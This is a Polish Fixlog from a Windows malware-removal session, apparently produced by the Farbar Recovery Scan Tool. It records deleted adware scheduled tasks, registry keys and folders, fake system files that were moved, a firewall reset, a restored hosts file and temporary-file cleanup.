pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{032BAD74-97C2-43DE-B45B-88930DDF692F} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{032BAD74-97C2-43DE-B45B-88930DDF692F} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2F04D6BD-444A-40B0-9AAF-7E16B78A5008} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F04D6BD-444A-40B0-9AAF-7E16B78A5008} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C3660774-1430-4C6F-8E8D-021096A1846D} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{494E40C4-7065-4724-A0CD-372B912DCB61} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{494E40C4-7065-4724-A0CD-372B912DCB61} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{55CA615F-492D-4305-B18F-FC520019D725} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55CA615F-492D-4305-B18F-FC520019D725} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Overwolf Updater Task => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Overwolf Updater Task => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{CB1675FB-1CFE-4EA8-B420-931065D8D9E8} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB1675FB-1CFE-4EA8-B420-931065D8D9E8} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Keyboard Checksum Verifier => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Keyboard Checksum Verifier => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Arujogh Cloud => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Arujogh Cloud => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\IBUpd2 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E5191DB7-0019-441E-A4BD-7057B820C5F5} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5191DB7-0019-441E-A4BD-7057B820C5F5} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Clihotain Configuration => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Clihotain Configuration => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E81B7F83-F695-4905-BD35-AAD17C8649AE} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E81B7F83-F695-4905-BD35-AAD17C8649AE} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E976FE0B-314A-4A6F-AF68-E8A931C88CFB} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E976FE0B-314A-4A6F-AF68-E8A931C88CFB} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Trojan Remover => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Trojan Remover => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA76DE69-D3A4-481C-BF44-2C2DC557314C} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA76DE69-D3A4-481C-BF44-2C2DC557314C} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FE9FF048-6797-4E07-AA29-BBDCC273E036} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FE9FF048-6797-4E07-AA29-BBDCC273E036} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => klucz pomyślnie usunięto HKCU\Software\Google\Chrome\Extensions => klucz pomyślnie usunięto HKCU\Software\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= C:\$AV_ASW => pomyślnie przeniesiono C:\Cosusp => pomyślnie przeniesiono C:\Pipisy => pomyślnie przeniesiono C:\Program Files\1ol3sxub => pomyślnie przeniesiono "C:\Program Files\AVAST Software" => nie znaleziono. C:\Program Files\Keyboard Checksum Verifier => pomyślnie przeniesiono C:\Program Files\MK => pomyślnie przeniesiono C:\Program Files\Common Files\509E0 => pomyślnie przeniesiono C:\Program Files\Common Files\Noobzo => pomyślnie przeniesiono C:\Program Files (x86)\Clihotain Configuration => pomyślnie przeniesiono C:\Program Files (x86)\Firefox => pomyślnie przeniesiono C:\Program Files (x86)\Hippig => pomyślnie przeniesiono C:\Program Files (x86)\MIO => pomyślnie przeniesiono C:\Program Files (x86)\Walchshjit => pomyślnie przeniesiono C:\ProgramData\log.binb => pomyślnie przeniesiono C:\ProgramData\log.ewbb => pomyślnie przeniesiono C:\ProgramData\log.ewbt => pomyślnie przeniesiono C:\ProgramData\.mono => pomyślnie przeniesiono C:\ProgramData\AVAST Software => pomyślnie przeniesiono C:\ProgramData\BIT => pomyślnie przeniesiono C:\ProgramData\Loaris => pomyślnie przeniesiono C:\ProgramData\SearchModule => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop => pomyślnie przeniesiono C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0} => pomyślnie przeniesiono C:\Stuvatybugtain => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449} => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\AdvinstAnalytics => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\background_fault => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\BrowserAir => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\Firefox => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\glory => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\Hippig => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\Phoceshgrherry => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\snare => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\terana => pomyślnie przeniesiono C:\Users\Lambert\AppData\Local\THQ => pomyślnie przeniesiono "C:\Users\Lambert\AppData\Roaming\AVAST Software" => nie znaleziono. C:\Users\Lambert\AppData\Roaming\DAEMON Tools Lite => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Event Monitor => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Firefox => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Google => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Microleaves => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofise => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Prageghtthasuy => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Showuk => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\UCChannel => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\WinSAPSvc => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk => pomyślnie przeniesiono C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PL => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Diablo III.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Quick Server.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Skype.lnk => pomyślnie przeniesiono C:\Users\Lambert\Desktop\Gówno\Spartan.lnk => pomyślnie przeniesiono =========== "C:\Users\Lambert\Downloads\AdwCleaner*.exe" ========== C:\Users\Lambert\Downloads\AdwCleaner 4.111.exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\AdwCleaner 5.013.exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\adwcleaner_6.047 (1).exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\adwcleaner_6.047 (2).exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\adwcleaner_6.047(1).exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\adwcleaner_6.047.exe => pomyślnie przeniesiono ========= Koniec -> "C:\Users\Lambert\Downloads\AdwCleaner*.exe" ======== =========== "C:\Users\Lambert\Downloads\Emsisoft*.exe" ========== C:\Users\Lambert\Downloads\Emsisoft Emergency Kit 2017.4.0.7437 [1].exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\Emsisoft Emergency Kit 2017.4.0.7437.exe => pomyślnie przeniesiono ========= Koniec -> "C:\Users\Lambert\Downloads\Emsisoft*.exe" ======== =========== "C:\Users\Lambert\Downloads\Loaris*.exe" ========== C:\Users\Lambert\Downloads\Loaris Trojan Remover 3.0.2 [1].exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\Loaris Trojan Remover 3.0.2.exe => pomyślnie przeniesiono ========= Koniec -> "C:\Users\Lambert\Downloads\Loaris*.exe" ======== =========== "C:\Users\Lambert\Downloads\Malwarebytes*.exe" ========== C:\Users\Lambert\Downloads\Malwarebytes Free 3.1.2.1733 [1].exe => pomyślnie przeniesiono C:\Users\Lambert\Downloads\Malwarebytes Free 3.1.2.1733.exe => pomyślnie przeniesiono ========= Koniec -> "C:\Users\Lambert\Downloads\Malwarebytes*.exe" ======== C:\Users\Lambert\Downloads\ReimageRepair.exe => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Documents\report.dat => pomyślnie przeniesiono C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\Windows\Reimage.ini => pomyślnie przeniesiono C:\Windows\csrss.exe => pomyślnie przeniesiono C:\Windows\taskmgr.exe => pomyślnie przeniesiono C:\Windows\Azart => pomyślnie przeniesiono =========== "C:\Windows\system32\Drivers\*.tmp" ========== nie znaleziono ========= Koniec -> "C:\Windows\system32\Drivers\*.tmp" ======== C:\Windows\system32\log => pomyślnie przeniesiono C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19683735 B Java, Flash, Steam htmlcache => 368280996 B Windows/system/drivers => 68085729 B Edge => 0 B Chrome => 278516206 B Firefox => 10440658 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 30270847 B systemprofile32 => 19677432 B LocalService => 66228 B NetworkService => 692 B Lambert => 312055531 B RecycleBin => 0 B EmptyTemp: => 1 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 19:22:05 ====